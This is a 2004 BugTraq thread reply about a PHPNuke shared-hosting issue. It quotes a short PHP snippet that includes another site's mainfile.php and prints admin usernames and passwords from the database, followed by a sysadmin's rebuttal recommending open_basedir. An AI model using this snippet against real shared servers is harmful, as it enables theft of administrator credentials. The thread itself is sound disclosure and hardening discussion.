|
|
BugTraq
Possible bug in PHPNuke and other CMS May 30 2004 02:53PM Luca Falavigna (fala83 libero it) (3 replies) Re: Possible bug in PHPNuke and other CMS Jun 01 2004 04:50AM Alexander GQ Gerasiov (bugtaq gq pp ru) (1 replies) Re: Possible bug in PHPNuke and other CMS Jun 01 2004 05:13PM Luca Falavigna (fala83 libero it) (1 replies) |
|
Privacy Statement |
> There is a vulnerability in PHPNuke that permits execution of arbitrary
> SQL queries on a database located in the same server of an attacker's
> account. This is the procedure: first of all attacker must create a
> symlink pointing to victim's db directory in PHPNuke home directory
> because of mainfile.php include method. After that he can build a simple
> php code executing a query to the PHPNuke database. Here is an example:
>
> <?php
> require_once ("/location_of_victim's_PHPNuke/mainfile.php");
> $sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
> while($record = $db->sql_fetchrow($sql))
> ~ echo "Username: $record[aid]\n<br>\nPassword: $record[pwd]\n<br><br>\n";
> unset($sql);
> ?>
This is an administration issue rather than a security vulnerability.
In order to use this attack the attacker requires access to:
1. Another site on the victim's server
2. A sufficiently poorly administered server on which (s)he can:
a. Create a symlink
or
b. Specify an absolute path for includes
Those hosting multiple PHP sites ought to be using PHP's open_basedir
directive to limit the files that can be opened by PHP. If this isn't
being used they are plenty of other easy attacks open to anyone with an
account on the same server.
--
Sam Bashton
Systems Administrator
IP Support
[ reply ]